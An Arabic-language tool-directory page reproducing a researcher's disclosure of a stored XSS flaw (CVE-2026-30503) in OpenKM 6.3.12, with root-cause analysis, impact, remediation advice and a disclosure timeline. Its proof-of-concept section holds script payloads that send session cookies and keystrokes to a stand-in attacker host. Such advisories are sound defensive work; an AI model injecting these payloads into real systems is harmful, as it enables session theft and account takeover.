Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30503-OpenKM-6.3.12-Stored-XSS — # الكشف التفصيلي عن CVE-2026-30503 كشف تفصيلي عن CVE-2026-30503، وهي ثغرة XSS مخزنة في OpenKM الإصدار v6.3.12. يتضمن تحليل السبب الجذري، وحمولات إثبات المفهوم (PoC)، وتقييم الأثر، وتوصيات المعالجة للباحثين الأمنيين ومختبري الاختراق. | Kitploit
أدوات/GitHubGitHub/dharmstm/cve-2026-30503-openkm-6.3.12-stored-xss
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubdharmstm/cve-2026-30503-openkm-6.3.12-stored-xss

CVE-2026-30503-OpenKM-6.3.12-Stored-XSS

# الكشف التفصيلي عن CVE-2026-30503 كشف تفصيلي عن CVE-2026-30503، وهي ثغرة XSS مخزنة في OpenKM الإصدار v6.3.12. يتضمن تحليل السبب الجذري، وحمولات إثبات المفهوم (PoC)، وتقييم الأثر، وتوصيات المعالجة للباحثين الأمنيين ومختبري الاختراق.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️ CVE-2026-30503 — ثغرة XSS مخزّنة في OpenKM v6.3.12

CVE Badge OpenKM Type Disclosure Status

اكتشفها وقدّمها Dharmendra Kumar — باحث أمني

الأمن السيبراني | اختبار الاختراق | أبحاث الثغرات | الإفصاح المسؤول


📌 فهرس المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • المنتج المتأثر
  • وصف الثغرة
  • تحليل السبب الجذري
  • تقييم الأثر والمخاطر
  • إثبات المفهوم (PoC)
  • المعالجة والتوصيات
  • الجدول الزمني للإفصاح
  • المراجع
  • عن الباحث

  • 🔍 نظرة عامة

    يوثّق هذا المستودع الإفصاح المسؤول عن CVE-2026-30503، وهي ثغرة سكربتات عبر المواقع المخزّنة (Stored XSS) تم تحديدها في OpenKM v6.3.12 — وهو نظام مفتوح المصدر لإدارة المستندات يُستخدم على نطاق واسع في بيئات المؤسسات.

    تسمح الثغرة لمهاجم مصادق بحقن JavaScript خبيث دائم في التطبيق، والذي يُنفَّذ في سياق متصفح أي مستخدم (بما في ذلك المسؤولون) يعرض المحتوى المتأثر لاحقاً.

    ⚠️ الشدة: عالية | متجه الهجوم: الشبكة | الصلاحيات المطلوبة: منخفضة | تفاعل المستخدم: مطلوب


    📋 تفاصيل CVE

    الحقلالتفاصيل
    معرف CVECVE-2026-30503
    المنتجOpenKM
    الإصدار المتأثرv6.3.12
    فئة الثغرةسكربتات عبر المواقع المخزّنة (Stored XSS)
    CWECWE-79: تحييد غير صحيح للمدخلات أثناء توليد صفحة الويب
    متجه CVSSCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
    الباحثDharmendra Kumar
    نوع الإفصاحمسؤول / منسّق

    📦 المنتج المتأثر

    OpenKM هو نظام مجاني ومفتوح المصدر لإدارة المستندات (DMS) يوفر واجهة ويب لإدارة مستندات الأعمال ومراجعتها وتوزيعها. يُستخدم من قبل المؤسسات والهيئات الحكومية والمؤسسات التعليمية حول العالم.

    • اسم المنتج: نظام إدارة المستندات OpenKM
    • الإصدار المتأثر: v6.3.12
    • موقع البائع: https://www.openkm.com
    • الفئة: نظام إدارة المستندات (DMS)
    • اللغة/التقنية: Java (JSP/Spring)

    🧨 وصف الثغرة

    تم اكتشاف ثغرات متعددة من نوع سكربتات عبر المواقع المخزّنة (Stored XSS) في OpenKM v6.3.12. يمكن لمهاجم يمتلك وصولاً مصادقاً بصلاحيات منخفضة حقن حمولات JavaScript عشوائية في حقل إدخال واحد أو أكثر. يتم تخزين هذه الحمولات بشكل دائم في الواجهة الخلفية للتطبيق وتنفيذها تلقائياً عندما يصل أي مستخدم — بما في ذلك المسؤولون — إلى الصفحة أو المكوّن المتأثر.

    على عكس XSS الانعكاسي (Reflected XSS)، الذي يتطلب من الضحية النقر على رابط مخصص، فإن حمولات XSS المخزّنة تكون مضمنة في التطبيق نفسه، مما يجعلها أكثر خطورة واستمرارية بشكل كبير.

    نقاط النهاية المعرضة للخطر

    • حقول الإدخال التي يتحكم بها المستخدم ضمن البيانات الوصفية للمستندات، أو الملاحظات، أو حقول التسمية
    • يفشل التطبيق في تعقيم أو ترميز إدخال المستخدم قبل عرضه مرة أخرى إلى المتصفح

    🔬 تحليل السبب الجذري

    تنبع الثغرة من ثلاث نقاط ضعف متراكمة في خط معالجة المدخلات في التطبيق:

    root@kitploit:~
    User Input ──► [NO Validation] ──► Stored in DB ──► [NO Output Encoding] ──► Rendered in Browser ──► XSS Executed
    
    نقطة الضعفالوصف
    ❌ نقص التحقق من المدخلاتلا يقيد التطبيق أو يعقّم الأحرف الخاصة (<, >, ", ', ;) في الحقول المقدمة من المستخدم
    ❌ نقص ترميز المخرجاتتُعرض القيم المخزنة مباشرة في HTML دون ترميز كيانات HTML
    ❌ عرض DOM غير آمنتُدمج البيانات المقدمة من المستخدم في سياق DOM دون ضوابط CSP أو تعقيم

    💥 تقييم الأثر والمخاطر

    يمكن أن يؤدي الاستغلال الناجح لهذه الثغرة إلى:

    الخطرالوصف
    🍪 اختطاف الجلسةسرقة رموز جلسة المصادقة عبر تسريب document.cookie
    👤 الاستيلاء على الحساباختراق حسابات الضحايا، بما في ذلك حسابات المسؤولين
    🔐 حصاد بيانات الاعتمادحقن نماذج تصيد لالتقاط بيانات تسجيل الدخول
    📤 تسريب البياناتاستخراج المستندات أو البيانات الوصفية الحساسة من نظام إدارة المستندات (DMS) بصمت
    ⚙️ إجراءات غير مصرح بهاتنفيذ عمليات بصلاحيات مرتفعة نيابة عن الضحية (حذف/تعديل المستندات)
    🎯 استهداف المسؤولينتنفيذ الحمولة في لوحة تحكم المسؤول عندما يراجع المسؤول المحتوى
    🔄 انتشار الدودةيمكن لحمولة XSS ذاتية النسخ الانتشار بين المستخدمين

    🧪 إثبات المفهوم (PoC)

    ⚠️ إخلاء مسؤولية: يُشارك هذا الإثبات (PoC) لأغراض تعليمية وبحثية أمنية بحتة وفقاً لمبادئ الإفصاح المسؤول. لا تستخدمه ضد أنظمة لا تملكها أو لا تملك إذناً كتابياً صريحاً لاختبارها.

    مثال على الحمولة (عام)

    root@kitploit:~
    // Basic PoC — demonstrates script execution
    <script>alert('CVE-2026-30503 - XSS by Dharmendra Kumar')</script>
    
    // Session token exfiltration
    <script>fetch('https://attacker.example.com/steal?c='+document.cookie)</script>
    
    // Keylogger injection
    <script>document.onkeypress=function(e){fetch('https://attacker.example.com/log?k='+e.key)}</script>
    

    خطوات إعادة الإنتاج

    1. سجّل الدخول إلى OpenKM v6.3.12 بحساب مصادق بصلاحيات منخفضة
    2. انتقل إلى حقل الإدخال المعرض للخطر (مثل البيانات الوصفية للمستند / الملاحظات / حقل العنوان)
    3. احقن حمولة XSS مثل <script>alert(document.cookie)</script>
    4. احفظ/أرسل الإدخال
    5. سجّل الدخول كمستخدم مختلف (أو كمسؤول) وانتقل إلى المورد المتأثر
    6. لاحظ تنفيذ حمولة JavaScript في سياق متصفح الضحية

    🛠️ المعالجة والتوصيات

    للمطورين / البائعين

    التوصيةالتنفيذ
    ✅ التحقق من المدخلاتاعتماد قائمة بيضاء للأحرف المسموح بها؛ ورفض أو إزالة الأحرف الخاصة بـ HTML في جميع مدخلات المستخدم
    ✅ ترميز المخرجاتاستخدام ترميز HTML حسب السياق (مثل OWASP Java Encoder) قبل عرض البيانات في HTML
    ✅ سياسة أمان المحتوى (CSP)تنفيذ ترويسة CSP صارمة: Content-Security-Policy: script-src 'self'
    ✅ ملفات تعريف الارتباط HTTPOnly وSecureتعيين علامتي HttpOnly وSecure على جميع ملفات تعريف ارتباط الجلسة لمنع وصول JavaScript إليها
    ✅ استخدام مكتبات أمنيةدمج OWASP AntiSamy أو DOMPurify لتعقيم HTML
    ✅ مراجعة الكود الأمنيةتدقيق جميع مسارات العرض بحثاً عن بيانات غير معقمة يتحكم بها المستخدم
    ✅ الترقيةتطبيق أحدث تصحيح مقدم من البائع أو الترقية إلى إصدار مصحح

    لمسؤولي الأنظمة

    • 🔒 قيّد الوصول إلى OpenKM على الشبكات الموثوقة فقط
    • 📊 راقب سجلات التطبيق بحثاً عن نشاط غير معتاد أو وسوم سكربت غير متوقعة في حقول الإدخال
    • 🔄 حافظ على تحديث التطبيق إلى أحدث إصدار مصحح
    • 🧩 انشر جدار حماية لتطبيقات الويب (WAF) مع قواعد كشف XSS كضابط تعويضي

    📅 الجدول الزمني للإفصاح

    التاريخالحدث
    🔍 الاكتشافتم تحديد الثغرة أثناء التقييم الأمني لـ OpenKM v6.3.12
    📧 إشعار البائعتم إرسال تقرير الإفصاح الأولي إلى فريق أمان OpenKM
    🤝 إقرار البائعأقرّ فريق OpenKM باستلام التقرير
    📝 تعيين CVEتم تعيين CVE-2026-30503 من قبل برنامج CVE
    🌐 الإفصاح العامإفصاح عام منسّق بعد فترة المعالجة

    تم الإفصاح عن هذه الثغرة باتباع أفضل ممارسات الإفصاح المسؤول، بالتنسيق مع البائع وبرنامج CVE قبل النشر العام.


    📚 المراجع

    • 🔗 [ Github] (https://github.com/dharmstm/OpenKM-6.3-Stored-XSS-Report/).
    • 🔗 إدخال MITRE CVE — CVE-2026-30503
    • 🔗 NVD — قاعدة بيانات الثغرات الوطنية
    • 🔗 الموقع الرسمي لـ OpenKM
    • 🔗 المرجع السريع لـ OWASP للوقاية من XSS
    • 🔗 CWE-79: السكربتات عبر المواقع
    • 🔗 OWASP Top 10 — A03:2021 الحقن

    👨‍💻 عن الباحث

    Dharmendra Kumar

    باحث أمني | مختبِر اختراق | صائد ثغرات

    Dharmendra Kumar هو باحث أمن سيبراني مستقل متخصص في أمن تطبيقات الويب واختبار الاختراق والإفصاح المسؤول عن الثغرات. من خلال تركيزه على تحديد العيوب الأمنية الواقعية في البرمجيات واسعة الاستخدام، يساهم عمله في تحسين الوضع الأمني للتطبيقات المستخدمة عالمياً.

    مجالات الخبرة:

    • 🌐 اختبار اختراق تطبيقات الويب
    • 🐛 صيد ثغرات Bug Bounty
    • 🔍 أبحاث الثغرات والإبلاغ عن CVE
    • 📋 الإفصاح المسؤول والنشرات الأمنية
    • 🛡️ ثغرات OWASP Top 10

    تواصل:

    LinkedIn GitHub Twitter


    ⚖️ إخلاء مسؤولية قانوني

    هذا المستودع مخصص لأغراض تعليمية وإعلامية فقط. تُنشر تفاصيل الثغرة وحمولات إثبات المفهوم المشاركة هنا وفقاً لمبادئ الإفصاح المسؤول. لا يوافق المؤلف ولا يشجع ولا يتحمل المسؤولية عن أي استخدام غير مصرح به لهذه المعلومات. احصل دائماً على إذن كتابي صريح قبل إجراء اختبارات أمنية على أي نظام.


    🙏 شكر وتقدير

    شكر خاص لكل من:

    • فريق تطوير OpenKM لتعاونهم أثناء عملية الإفصاح المسؤول
    • برنامج CVE / مؤسسة MITRE لتعيين وتنسيق معرف CVE
    • مجتمع أبحاث الأمن الأوسع لجهودهم المستمرة في جعل البرمجيات أكثر أماناً للجميع

    ⭐ إذا كان هذا البحث مفيداً، ففكر في إضافة نجمة إلى هذا المستودع.

    © 2026 Dharmendra Kumar — جميع الحقوق محفوظة

    Visitors

    تنزيل الأداة